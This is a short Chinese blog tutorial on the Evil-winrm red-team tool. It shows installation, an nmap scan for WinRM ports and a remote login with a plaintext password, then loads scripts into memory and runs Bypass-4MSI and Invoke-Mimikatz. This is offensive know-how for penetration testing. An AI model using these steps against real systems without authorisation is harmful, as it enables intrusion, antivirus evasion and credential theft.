首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >红队神器Evil-winrm使用指南

红队神器Evil-winrm使用指南

作者头像
逍遥子大表哥
发布2025-07-28 21:13:28
发布2025-07-28 21:13:28
3340
举报
文章被收录于专栏:kali blogkali blog

Evil-winrm 是一款使用ruby 语言开发的开源工具。该工具具有许多很酷的功能,包括使用纯文本密码远程登录、SSL 加密登录、 NTLM 哈希登录、密钥登录、文件传输、日志存储等功能。使用 evil-winrm,我们可以获得远程主机的 PowerShell命令终端会话。同时此工具已在Kali Linux系统中集成。

其他系统安装

如果你的kali中没有安装, 我们可以用下面的命令进行安装。

代码语言:javascript
复制
apt-get install evil-winrm 

关于WinRM

Windows远程管理(WinRM)是Windows Server 2003 R2以上版本中一种新式的方便远程管理的服务。WinRM是远程管理应用的“服务器”组成部分,并且WinRS(Windows远程Shell)是WinRM的“客户端”,它在远程管理WinRM服务器的计算机上运行。然而,我们应该注意到两个计算机必须手动安装WinRS,还要使WinRM能够启动并从远程系统传回信息。

启用WinRM

powershell窗口中(管理员身份运行)输入enable-psremoting,启用WinRM会话配置

或者,我们用nmap进行端口扫描检查。

代码语言:javascript
复制
nmap -p5985,5986 192.168.5.38

食用指南

假设我们在账户枚举阶段获得了明文密码,并且注意到远程主机启用了 winrm 服务 ,我们可以使用 evil-winrm 在目标系统上进行远程会话。命令如下:

代码语言:javascript
复制
evil-winrm -i 192.168.5.38 -u kali -p admin12345  

加载 Powershell 脚本

Evil-winrm 还提供了一项允许我们使用来自目标主机自带的powershell脚本的功能。可以直接将脚本加载到内存中 ,我们可以使用带有-s 参数接目标系统的powershell脚本的相对路径

代码语言:javascript
复制
evil-winrm -i 192.168.5.38 -u kali -p admin12345 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

BREAK AWAY

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-07-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 kali笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 其他系统安装
  • 关于WinRM
  • 食用指南
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档